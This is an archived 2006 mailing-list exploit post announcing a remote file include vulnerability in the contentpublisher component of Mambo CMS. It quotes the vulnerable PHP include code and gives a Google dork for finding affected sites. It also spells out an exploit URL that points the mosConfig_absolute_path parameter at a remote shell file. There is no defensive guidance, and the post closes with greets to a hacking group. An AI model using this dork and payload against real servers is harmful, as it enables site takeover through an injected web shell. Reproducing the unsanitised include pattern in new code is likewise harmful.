contentpublisher Mambo Component Remote File Include Vulnerabilities

crackers_child Fri, 18 Aug 2006 12:01:43 -0700

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!

--------------------------------------------------------------------------------



Title : contentpublisher Mambo Component Remote File Include Vulnerabilities


--------------------------------------------------------------------------------

#Author: Crackers_Child



[EMAIL PROTECTED]: [EMAIL PROTECTED]


--------------------------------------------------------------------------------


Google Dorks  : inurl:"/com_contentpublisher/"


------------------------- 
-------------------------------------------------------


Application :  contentpublisher/  Component of Mambo


--------------------------------------------------------------------------------


Bug &#304;n contentpublisher.php


global $my, $mosConfig_live_site, $mosConfig_lang;


if 
(file_exists($mosConfig_absolute_path.'/components/com_contentpublisher/languages/'.$mosConfig_lang.'.php'))
 {

    
include($mosConfig_absolute_path.'/components/com_contentpublisher/languages/'.$mosConfig_lang.'.php');

} else {

    
include($mosConfig_absolute_path.'/components/com_contentpublisher/languages/english.php');

} 


--------------------------------------------------------------------------------


Exploit:


http://[target]/[mambo_path]/components/contentpublisher/contentpublisher.php?mosConfig_absolute_path=Shell.txt?


--------------------------------------------------------------------------------


greets:


All My Friends And SiberSavascilar.Com Members !


--------------------------------------------------------------------------------



--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] 
--------------------------------------

contentpublisher Mambo Component Remote File Include Vulnerabilities

Reply via email to